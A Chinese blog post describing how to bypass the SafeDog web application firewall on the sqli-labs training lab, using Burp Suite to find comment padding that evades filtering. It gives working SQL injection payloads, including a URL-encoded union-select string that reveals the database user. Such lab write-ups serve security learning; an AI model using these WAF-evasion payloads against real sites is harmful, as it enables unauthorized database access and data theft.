过waf的小思路-安全狗

1.在安装好的sqli-labs-master的第一关中输入?id=1,可以看到显示出用户名与密码
在这里插入图片描述
2.输入?id=1’ 可以看出存在sql注入漏洞
在这里插入图片描述
3.当输入?id=1’ and 1=1时,可以看出当前页面被安全狗拦截
在这里插入图片描述
4.开启Burp抓包,对空格进行暴力破解可以看到当空格为/*/~*/ 时,绕过安全狗。
在这里插入图片描述
5.输入order by发现在当前列有三列
在这里插入图片描述

在这里插入图片描述
6.使用联合语句进行sql注入,union/*/~*/select/*/~*/1,2,3--+,发现被安全狗拦截。
在这里插入图片描述
7.使用BurpSuite对进行标注/*/~*/
在这里插入图片描述
8.设置有效载荷类型为爆破,字符集为特殊字符;其余两个同样。
在这里插入图片描述
9.点击长度发现&=/与其它长度不同。
在这里插入图片描述
10测试发现成功绕过waf,注意:需要将&=/进行url编码。
![!](https://img-blog.csdnimg.cn/7e5e044752ff418ab6381913c81872b0.png)
11.输入?id=-1'/*%26%3d%2f*/union/*%26%3d%2f*/select/*%26%3d%2f*/1,2,user/*%26%3d%2f*/()--+,发现页面显示出数据库的名字。
在这里插入图片描述
安全狗对information_schema拦截比较厉害,目前还没有找到绕过得办法,以后补上

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值